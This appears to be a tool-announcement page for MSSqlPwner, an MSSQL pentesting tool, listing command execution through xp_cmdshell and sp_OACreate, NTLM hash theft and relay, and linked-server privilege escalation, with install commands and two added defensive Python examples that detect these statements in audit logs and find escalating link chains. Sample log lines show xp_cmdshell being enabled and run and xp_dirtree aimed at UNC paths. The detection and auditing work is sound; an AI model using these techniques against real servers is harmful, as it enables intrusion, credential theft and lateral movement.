MSSqlPwner – An Advanced And Versatile Pentesting Tool Designed To Seamlessly Interact With MSSQL Servers And Based On Impacket



MSSqlPwner is an advanced and versatile pentesting tool, built on Impacket, designed to interact seamlessly with MSSQL servers. It lets ethical hackers and security professionals conduct comprehensive security assessments of MSSQL environments.

With MSSqlPwner, users can execute custom commands through several methods, including custom assemblies, xp_cmdshell, sp_oacreate (Ole Automation Procedures) and more.

The tool starts with a recursive enumeration of linked servers and gathers all possible chains.

MSSqlPwner can also be used for NTLM relay, using functions such as xp_dirtree, xp_subdirs and xp_fileexist, as well as command execution.

This tool provides opportunities for lateral movement assessments and exploration of linked servers.

If the authenticated MSSQL user lacks permission for certain operations, the tool can look for a chain that might allow them. For example, it can send a query to a linked server that links back to the originating MSSQL service with higher permissions. The tool also supports recursive querying across links, executing queries and commands on otherwise inaccessible linked servers, directed from the compromised MSSQL service.

The tool supports multiple authentication methods, described below.


Disclaimer

This tool is designed for security professionals and researchers for testing purposes only and should not be used for illegal purposes.

Functionalities:

  1. Command Execution: Execute commands using the following functions:
  • xp_cmdshell on local server or on linked servers
  • sp_oacreate (Ole Automation Procedures) on local server or on linked servers
  2. NTLM Hash Stealing and Relay: Issue NTLM relay or steal NTLM hashes using the following functions:
  • xp_dirtree on local server or on linked servers
  • xp_subdirs on local server or on linked servers
  • xp_fileexist on local server or on linked servers
  3. Encapsulated Commands and Queries: Execute encapsulated commands or queries using the following options:
  • execute_command on local server or on linked servers
  • run_query on local server or on linked servers
  • run_query_system_service on local server or on linked servers as system user
  4. Direct Queries
  • direct_query – execute direct queries on local or linked servers as system user.
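From the defender's side, every function listed above leaves a statement in the SQL Server Audit or Extended Events trail, and the UNC path passed to xp_dirtree, xp_subdirs or xp_fileexist is exactly what makes the service account authenticate outbound. The following added example (not part of MSSqlPwner or the original page) runs a small rule set over constructed audit lines in the shape "<timestamp> <login> <statement>"; the line format, rule names, hostnames and logins are all assumptions made for the example.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample lines, shaped as "<timestamp> <login> <statement>", roughly
# how a SQL Server Audit or Extended Events capture might be flattened to text.
# They are made up for this example, not real log output.
SAMPLE_AUDIT_LINES = [
    "2024-05-01T10:00:01 CORP\\svc_app SELECT name FROM sys.tables",
    "2024-05-01T10:00:07 CORP\\svc_app EXEC master..xp_dirtree '\\\\10.0.0.5\\share', 1, 1",
    "2024-05-01T10:00:09 CORP\\svc_app EXEC master..xp_fileexist '\\\\192.0.2.10\\x\\y.txt'",
    "2024-05-01T10:00:12 sa EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE",
    "2024-05-01T10:00:15 sa EXEC xp_cmdshell 'whoami'",
    "2024-05-01T10:00:20 CORP\\svc_app EXEC ('EXEC xp_cmdshell ''hostname''') AT [LINKED-SQL02]",
    "2024-05-01T10:00:25 CORP\\svc_app DECLARE @o INT; EXEC sp_OACreate 'WScript.Shell', @o OUT",
    "2024-05-01T10:00:30 CORP\\reporting SELECT * FROM OPENQUERY([LINKED-SQL02], 'SELECT 1')",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<login>\S+)\s+(?P<stmt>.+)$")

# Detection rules: (name, severity, pattern). Case-insensitive because T-SQL
# identifiers are not case-sensitive under the default collations.
RULES = [
    ("xp_cmdshell_enabled", "high",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I)),
    ("ole_automation_enabled", "high",
     re.compile(r"sp_configure\s+'Ole Automation Procedures'\s*,\s*1", re.I)),
    ("xp_cmdshell_exec", "high",
     re.compile(r"\bEXEC(UTE)?\s+(master\.\.|master\.dbo\.)?xp_cmdshell\b", re.I)),
    ("ole_automation_exec", "high",
     re.compile(r"\bsp_OA(Create|Method)\b", re.I)),
    # xp_dirtree / xp_subdirs / xp_fileexist given a UNC path make the SQL
    # Server service account authenticate outbound to that host.
    ("unc_forced_auth", "medium",
     re.compile(r"\bxp_(dirtree|subdirs|fileexist)\b[^']*'\\\\", re.I)),
    # Pass-through execution on a linked server: low on its own, but it is
    # how a chain through linked servers shows up in the originating log.
    ("linked_server_passthrough", "low",
     re.compile(r"\bOPENQUERY\s*\(|\bAT\s+\[[^\]]+\]", re.I)),
]

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}


@dataclass(frozen=True)
class Finding:
    timestamp: str
    login: str
    rule: str
    severity: str
    statement: str


def analyze(lines):
    """Return one Finding per (line, matching rule); a line can hit several rules."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected shape
        stmt = m.group("stmt")
        for name, severity, pattern in RULES:
            if pattern.search(stmt):
                findings.append(Finding(m.group("ts"), m.group("login"), name, severity, stmt))
    return findings


def summarize(findings):
    """Count findings per rule name, e.g. {'unc_forced_auth': 2, ...}."""
    return dict(Counter(f.rule for f in findings))


def highest_severity(findings):
    """Worst severity seen, or None when nothing matched."""
    if not findings:
        return None
    return max(findings, key=lambda f: SEVERITY_RANK[f.severity]).severity


if __name__ == "__main__":
    for f in analyze(SAMPLE_AUDIT_LINES):
        print(f"{f.timestamp} {f.severity:6} {f.rule:26} {f.login}: {f.statement}")
    print(summarize(analyze(SAMPLE_AUDIT_LINES)))
```

The sixth sample line hits two rules at once (xp_cmdshell inside an EXEC ... AT [linked] pass-through), which is the pattern to watch for when a chain is being used rather than the local server. Enabling xp_cmdshell or Ole Automation Procedures via sp_configure is flagged separately from their use, since a change to either option is itself worth an alert.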

Lateral Movement and Chain Exploration:

MSSqlPwner provides opportunities for lateral movement assessments and exploration of linked servers. In scenarios where the current session lacks administrative privileges, the tool attempts to find a chain that escalates its privileges via linked servers. If a session on a linked server has higher privileges, the tool can interact with that linked server and perform a linked query back to the host with the elevated privileges, enabling lateral movement to the target server.
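The chain described above is a property of the linked-server configuration, so a defender can find it before an assessment does. The following added example (not MSSqlPwner's code and not from the original page) audits a constructed inventory of linked-server entries for chains that end on a sysadmin-mapped login, distinguishing chains that loop back to the origin (the escalation the text describes) from chains that land elsewhere (lateral movement). It goes slightly beyond the text by reporting both kinds. The server names, logins and the Link record shape are assumptions; in practice the inventory would be built from sys.servers and sys.linked_logins on each instance, with the sysadmin flag checked on the target.

```python
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Link:
    source: str               # instance that defines the linked server entry
    target: str               # instance the entry points at
    remote_login: str         # login the link maps to on the target
    remote_is_sysadmin: bool  # that login holds sysadmin on the target


# Constructed inventory (made up for this example). In practice you would build
# it by querying sys.servers and sys.linked_logins on every instance and checking
# each mapped login against sys.server_role_members on the target.
LINKS = [
    Link("SQL01", "SQL02", "svc_link", False),
    Link("SQL02", "SQL03", "svc_reports", False),
    Link("SQL03", "SQL01", "sa", True),         # maps back to SQL01 as sysadmin
    Link("SQL02", "SQL04", "svc_link", False),
    Link("SQL04", "SQL02", "svc_link", False),  # harmless loop, low privilege
]


def find_escalating_chains(links, origin, max_depth=6):
    """Breadth-first search over the link graph starting at `origin`.

    Returns every chain (a list of Link) whose final hop lands on a server
    where the mapped login is sysadmin. A chain never revisits a server it has
    already passed through, except that it may end back at `origin` (the loop
    the text describes). Chains longer than max_depth are cut off.
    """
    by_source = {}
    for link in links:
        by_source.setdefault(link.source, []).append(link)

    found = []
    queue = deque([link] for link in by_source.get(origin, []))
    while queue:
        chain = queue.popleft()
        last = chain[-1]
        if last.remote_is_sysadmin:
            found.append(chain)       # privileged hop reached; stop extending
            continue
        if last.target == origin:
            continue                  # looped back without privilege: dead end
        if len(chain) >= max_depth:
            continue
        visited = {origin} | {l.target for l in chain}
        for nxt in by_source.get(last.target, []):
            if nxt.target == origin or nxt.target not in visited:
                queue.append(chain + [nxt])
    return found


def chain_loops_back(chain, origin):
    """True when the privileged hop is back on the origin server itself."""
    return chain[-1].target == origin


def describe(chain):
    """Render a chain as 'A -> B (login) -> C (login, sysadmin)'."""
    parts = [chain[0].source]
    for link in chain:
        tag = link.remote_login + (", sysadmin" if link.remote_is_sysadmin else "")
        parts.append(f"{link.target} ({tag})")
    return " -> ".join(parts)


if __name__ == "__main__":
    for origin in ("SQL01", "SQL02", "SQL03", "SQL04"):
        for chain in find_escalating_chains(LINKS, origin):
            flag = "LOOPS BACK" if chain_loops_back(chain, origin) else "lateral"
            print(f"{origin}: {describe(chain)}  [{flag}]")
```

In the constructed inventory the only escalating path from SQL01 is SQL01 -> SQL02 -> SQL03 -> SQL01, where SQL03's link maps back as sa. The fix on the defender's side is in sys.linked_logins: map links to a least-privilege login on the target instead of sa or a sysadmin, and remove links that point back into a server that already links out.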

Authentication Methods:

The tool supports multiple authentication methods, including:

  • Windows credentials
  • MSSQL credentials
  • Kerberos authentication
  • Kerberos tickets
  • NTLM Hashes

The tool adapts to various scenarios and environments, verifying the effectiveness of authentication mechanisms.

Take your MSSQL environment assessments to the next level with the power and versatility of MSSqlPwner. Discover new possibilities for lateral movement, stealthy querying, and precise security evaluations with the MSSqlPwner tool.

Installation

git clone https://github.com/El3ct71k/MSSqlPwner
cd MSSqlPwner
pip3 install -r requirements.txt
python3 MSSqlPwner.py

Usage

Thanks
  • Kim Dvash for designing this incredible logo.


